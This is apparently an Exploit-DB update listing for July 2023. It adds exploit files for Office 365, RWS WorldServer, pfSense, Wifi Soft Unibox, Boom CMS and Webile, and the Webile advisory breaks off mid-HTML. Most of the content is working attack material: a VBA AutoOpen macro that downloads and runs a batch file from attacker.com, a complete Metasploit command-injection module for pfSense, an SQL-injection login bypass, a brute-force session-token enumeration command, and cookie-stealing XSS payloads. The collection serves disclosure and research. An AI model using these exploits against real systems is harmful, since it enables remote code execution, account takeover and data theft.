DB: 2023-07-21

10 changes to exploits/shellcodes/ghdb

Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.

RWS WorldServer 11.7.3 - Session Token Enumeration

Aures Booking & POS Terminal - Local Privilege Escalation

Boom CMS v8.0.7 - Cross Site Scripting

PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

pfSense v2.7.0 - OS Command Injection

Webile v1.0.1 - Multiple Cross Site Scripting

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

exploits/multiple/remote/51609.txt

@@ -0,0 +1,43 @@
+## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
+## Author: nu11secur1ty
+## Date: 07.18.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
+## Reference: https://portswigger.net/web-security/access-control
+## CVE-2023-33148
+
+
+## Description:
+The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
+Elevation of Privilege.
+The attacker can use this vulnerability to attach a very malicious
+WORD file in the Outlook app which is a part of Microsoft Office 365
+and easily can trick the victim to click on it - opening it and
+executing a very dangerous shell command, in the background of the
+local PC. This execution is without downloading this malicious file,
+and this is a potential problem and a very dangerous case! This can be
+the end of the victim's PC, it depends on the scenario.
+
+## Staus: HIGH Vulnerability
+
+[+]Exploit:
+
+- Exploit Server:
+
+```vb
+Sub AutoOpen()
+  Call Shell("cmd.exe /S /c" & "curl -s
+https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
+&& .\salaries.bat", vbNormalFocus)
+End Sub
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
+
+## Time spend:
+00:35:00

exploits/multiple/webapps/51619.txt

@@ -0,0 +1,176 @@
+Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration
+Session tokens in RWS WorldServer have a low entropy and can be
+enumerated, leading to unauthorised access to user sessions.
+
+
+Details
+=======
+
+Product: WorldServer
+Affected Versions: 11.7.3 and earlier versions
+Fixed Version: 11.8.0
+Vulnerability Type: Session Token Enumeration
+Security Risk: high
+Vendor URL: https://www.rws.com/localization/products/additional-solutions/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
+Advisory Status: published
+CVE: CVE-2023-38357
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357
+
+
+Introduction
+============
+
+"WorldServer offers a flexible, enterprise-class translation management
+system that automates translation tasks and greatly reduces the cost of
+supporting large volumes of local language content."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+WorldServer associates user sessions with numerical tokens, which always
+are positive values below 2^31. The SOAP action "loginWithToken" allows
+for a high amount of parallel attempts to check if a token is valid.
+During analysis, many assigned tokens were found to be in the 7-digit
+range of values. An attacker is therefore able to enumerate user
+accounts in only a few hours.
+
+
+Proof of Concept
+================
+
+In the following an example "loginWithToken" request is shown:
+
+-----------------------------------------------------------------------
+POST /ws/services/WSContext HTTP/1.1
+Content-Type: text/xml;charset=UTF-8
+SOAPAction: ""
+Content-Length: 501
+Host: www.example.com
+Connection: close
+User-Agent: agent
+
+<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:soapenv="http://schemas.xmlsoap.org">
+     <soapenv:Header/>
+     <soapenv:Body>
+        <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+           <token xsi:type="xsd:string">FUZZ</token>
+        </com:loginWithToken>
+     </soapenv:Body>
+</soapenv:Envelope>
+-----------------------------------------------------------------------
+
+It can be saved as file "login-soap.req" and be used as a request
+template for the command-line HTTP enumerator monsoon [1] to achieve
+many parallel requests:
+
+-----------------------------------------------------------------------
+$ monsoon fuzz --threads 100 \
+--template-file login-soap.req \
+--range 1-2147483647 \
+--hide-pattern "InvalidSessionException" \
+'https://www.example.com'
+
+Target URL: https://www.example.com/
+
+   status   header     body   value    extract
+
+      500      191      560   5829099
+      500      191      556   6229259
+      200      191     3702   7545136
+      500      191      556   9054984
+[...]
+processed 12000000 HTTP requests in 2h38m38s
+4 of 12000000 requests shown, 1225 req/s
+-----------------------------------------------------------------------
+
+The --range parameter reflects the possible value range of 2^31 and for
+each value an HTTP request is sent to the WorldServer SOAP API where the
+FUZZ marker in the request template is replaced with the respective
+value. Also responses are hidden which contain "InvalidSessionException"
+as these sessions are invalid. Responses will yield a status code of 200
+if an administrative session token is found. For an unprivileged user
+session, status code 500 is returned.
+
+
+Workaround
+==========
+
+Lower the rate at which requests can be issued, for example with a
+frontend proxy.
+
+
+Fix
+===
+
+According to the vendor, upgrading to versions above 11.8.0 resolves the
+vulnerability.
+
+
+Security Risk
+=============
+
+Attackers can efficiently enumerate session tokens. In a penetration
+test, it was possible to get access to multiple user accounts, including
+administrative accounts using this method in under three hours.
+Additionally, by using such an administrative account it seems likely to
+be possible to execute arbitrary code on the underlying server by
+customising the REST API [2]. Thus, the vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2023-03-27 Vulnerability identified
+2023-03-30 Customer approved disclosure to vendor
+2023-04-03 Requested security contact from vendor
+2023-04-06 Vendor responded with security contact
+2023-04-14 Advisory sent to vendor
+2023-04-18 Vendor confirms vulnerability and states that it was already
+known and fixed in version 11.8.0.
+2023-07-03 Customer confirms update to fixed version
+2023-07-05 CVE ID requested
+2023-07-15 CVE ID assigned
+2023-07-19 Advisory released
+
+References
+==========
+
+[1] https://github.com/RedTeamPentesting/monsoon
+[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://jobs.redteam-pentesting.de/
+
+--
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Alter Posthof 1                           Fax : +49 241 510081-99
+52062 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen

exploits/php/webapps/51608.rb

@@ -0,0 +1,244 @@
+# Exploit Title: pfSense v2.7.0 - OS Command Injection
+#Exploit Author: Emir Polat
+# CVE-ID : CVE-2023-27253
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Restore RRD Data Command Injection',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of
+          pfSense prior to version 2.7.0 which allows an authenticated attacker with the  "WebCfg - Diagnostics: Backup & Restore"
+          privilege to execute arbitrary operating system commands as the "root" user.
+
+          This module has been tested successfully on version 2.6.0-RELEASE.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emir Polat', # vulnerability discovery & metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-27253'],
+          ['URL', 'https://redmine.pfsense.org/issues/13935'],
+          ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
+        ],
+        'DisclosureDate' => '2023-03-18',
+        'Platform' => ['unix'],
+        'Arch' => [ ARCH_CMD ],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'Payload' => {
+          'BadChars' => "\x2F\x27",
+          'Compat' =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat'
+            }
+        },
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
+    ]
+  end
+
+  def check
+    unless login
+      return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    unless res&.body&.include?('Diagnostics: ')
+      return Exploit::CheckCode::Safe('Vulnerable module not reachable')
+    end
+
+    version = detect_version
+    unless version
+      return Exploit::CheckCode::Detected('Unable to get the pfSense version')
+    end
+
+    unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
+      return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
+    end
+
+    Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
+  end
+
+  def login
+    # Skip the login process if we are already logged in.
+    return true if @logged_in
+
+    csrf = get_csrf('index.php', 'GET')
+    unless csrf
+      print_error('Could not get the expected CSRF token for index.php when attempting login!')
+      return false
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      },
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 302
+      @logged_in = true
+      true
+    else
+      false
+    end
+  end
+
+  def detect_version
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    # If the response isn't a 200 ok response or is an empty response, just return nil.
+    unless res && res.code == 200 && res.body
+      return nil
+    end
+
+    if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
+      nil
+    else
+      version
+    end
+  end
+
+  def get_csrf(uri, methods)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, uri),
+      'method' => methods,
+      'keep_cookies' => true
+    )
+
+    unless res && res.body
+      return nil # If no response was returned or an empty response was returned, then return nil.
+    end
+
+    # Try regex match the response body and save the match into a variable named csrf.
+    if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
+      return nil # No match could be found, so the variable csrf won't be defined.
+    else
+      return csrf
+    end
+  end
+
+  def drop_config
+    csrf = get_csrf('diag_backup.php', 'GET')
+    unless csrf
+      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
+    end
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
+    post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
+    post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
+    post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res && res.code == 200 && res.body =~ /<rrddatafile>/
+      return res.body
+    else
+      return nil
+    end
+  end
+
+  def exploit
+    unless login
+      fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
+    end
+
+    csrf = get_csrf('diag_backup.php', 'GET')
+    unless csrf
+      fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
+    end
+
+    config_data = drop_config
+    if config_data.nil?
+      fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
+    end
+
+    if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
+    end
+    config_data.gsub!(' ', '${IFS}')
+    send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
+
+    post_data = Rex::MIME::Message.new
+
+    post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
+    post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
+    post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
+    post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
+    post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
+    post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
+    post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s,
+      'keep_cookies' => true
+    )
+
+    if res
+      print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
+    end
+  end
+end

exploits/php/webapps/51610.txt

@@ -0,0 +1,111 @@
+# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
+# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
+# Date: 07/2023
+# Exploit Author: Ansh Jain @sudoark
+# Author  Contact : arkinux01@gmail.com
+# Vendor Homepage: https://www.wifi-soft.com/
+# Software Link:
+https://www.wifi-soft.com/products/unibox-hotspot-controller.php
+# Version: Unibox Administration 3.0 & 3.1
+# Tested on: Microsoft Windows 11
+# CVE : CVE-2023-34635
+# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635
+
+The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
+SQL Injection, which can lead to unauthorised admin access for attackers.
+The vulnerability occurs because of not validating or sanitising the user
+input in the username field of the login page and directly sending the
+input to the backend server and database.
+
+## How to Reproduce
+Step 1 : Visit the login page and check the version, whether it is 3.0,
+3.1, or not.
+Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
+enter any random password.
+Step 3 : Fill in the captcha and hit login. After hitting login, you have
+been successfully logged in as an administrator and can see anyone's user
+data, modify data, revoke access, etc.
+
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+### Login Request
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+-----------------------------------------------------------------------------------------------------------------------
+Parameters: username, password, captcha, action
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /index.php HTTP/2
+Host: 255.255.255.255.host.com
+Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 83
+Origin: https://255.255.255.255.host.com
+Referer: https://255.255.255.255.host.com/index.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+
+username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+### Login Response
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+HTTP/2 302 Found
+Server: nginx
+Date: Tue, 18 Jul 2023 13:32:14 GMT
+Content-Type: text/html; charset=UTF-8
+Location: ./dashboard/dashboard
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+### Successful Loggedin Request
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+GET /dashboard/dashboard HTTP/2
+Host: 255.255.255.255.host.com
+Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://255.255.255.255.host.com/index.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+### Successful Loggedin Response
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+HTTP/2 200 OK
+Server: nginx
+Date: Tue, 18 Jul 2023 13:32:43 GMT
+Content-Type: text/html; charset=UTF-8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Cache_control: private
+
+
+<!DOCTYPE html>
+<html lang="en">
+html content
+</html>

exploits/php/webapps/51612.txt

@@ -0,0 +1,206 @@
+# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting
+References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274
+Release Date: 2023-07-03
+Vulnerability Laboratory ID (VL-ID): 2274
+
+Product & Service Introduction:
+===============================
+Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life
+easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.
+It gives editors control but doesn't require any technical knowledge.
+
+(Copy of the Homepage:https://www.boomcms.net/boom-boom )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.
+
+
+Affected Product(s):
+====================
+UXB London
+Product: Boom v8.0.7 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-07-24: Researcher Notification & Coordination (Security Researcher)
+2022-07-25: Vendor Notification (Security Department)
+2023-**-**: Vendor Response/Feedback (Security Department)
+2023-**-**: Vendor Fix/Patch (Service Developer Team)
+2023-**-**: Security Acknowledgements (Security Department)
+2023-07-03: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The vulnerability is located in the input fields of the album title and album description in the asset-manager module.
+Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.
+After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.
+The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse
+the content by usage of a backslash. Thus does not have any impact to inject own malicious
+java-scripts because of its only performed for double- and single-quotes to prevent sql injections.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] assets-manager (album)
+
+Vulnerable Function(s):
+[+] add
+
+Vulnerable Parameter(s):
+[+] title
+[+] description
+
+Affected Module(s):
+[+] Frontend (Albums)
+[+] Backend (Albums Assets)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Login to the application as restricted user
+2. Create a new album
+3. Inject a test script code payload to title and description
+4. Save the request
+5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
+6. Successful reproduce of the persistent cross site web vulnerability!
+
+
+Payload(s):
+><script>alert(document.cookie)</script><div style=1
+<a onmouseover=alert(document.cookie)>test</a>
+
+
+--- PoC Session Logs (Inject) ---
+https://localhost:8000/boomcms/album/35
+Host: localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 263
+Origin:https://localhost:8000
+Connection: keep-alive
+Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
+Sec-Fetch-Site: same-origin
+{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
+"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"
+:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
+-
+PUT: HTTP/1.1 200 OK
+Server: Apache
+Cache-Control: no-cache, private
+Set-Cookie: Max-Age=7200; path=/
+Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
+VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
+yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
+Max-Age=7200; path=/; httponly
+Content-Length: 242
+Connection: Keep-Alive
+Content-Type: application/json
+-
+https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
+Host: localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
+VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
+yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
+-
+GET: HTTP/1.1 200 OK
+Server: Apache
+Cache-Control: no-cache, private
+Set-Cookie:
+Vary: Accept-Encoding
+Content-Length: 7866
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+-
+
+
+Vulnerable Source: asset-manager/albums/[ID]
+
+<li data-album="36">
+<a href="#albums/20">
+<div>
+<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
+<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
+<p class='count'><span>0</span> assets</p>
+</div>
+</a>
+</li>
+</iframe></p></div></a></li></ul></div></div>
+</div>
+
+<div id="b-assets-view-asset-container"></div>
+<div id="b-assets-view-selection-container"></div>
+<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
+<div class="heading">
+<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
+<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
+</div>
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.
+Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

exploits/php/webapps/51616.txt

@@ -0,0 +1,240 @@
+Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2321
+
+
+Release Date:
+=============
+2023-07-03
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2321
+
+
+Common Vulnerability Scoring System:
+====================================
+5.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in
+the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,
+statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other
+functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,
+Windows, Linux, iOS, Android and other multi-platform operating systems.
+
+(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.
+
+Affected Product(s):
+====================
+Product Owner: Webile
+Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-10-11: Researcher Notification & Coordination (Security Researcher)
+2022-10-12: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-03: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious
+script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
+source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] new_file_name
+[+] i
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Vulnerable Source: Send
+Send message to phone listing
+<div class="layui-colla-item">
+<div class="layui-card-header">Message</div>
+<div class="layui-colla-content" style="display:block;padding-left:16px;">
+<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"
+title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
+<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
+</div></div></div>
+history logs messages
+<table class="layui-table layui-form">
+<thead><tr>
+<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
+<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
+<th style="border-right-width:1px;">Message</th>
+<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
+<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
+</thead>
+<tbody><tr>
+<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
+<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
+</td>
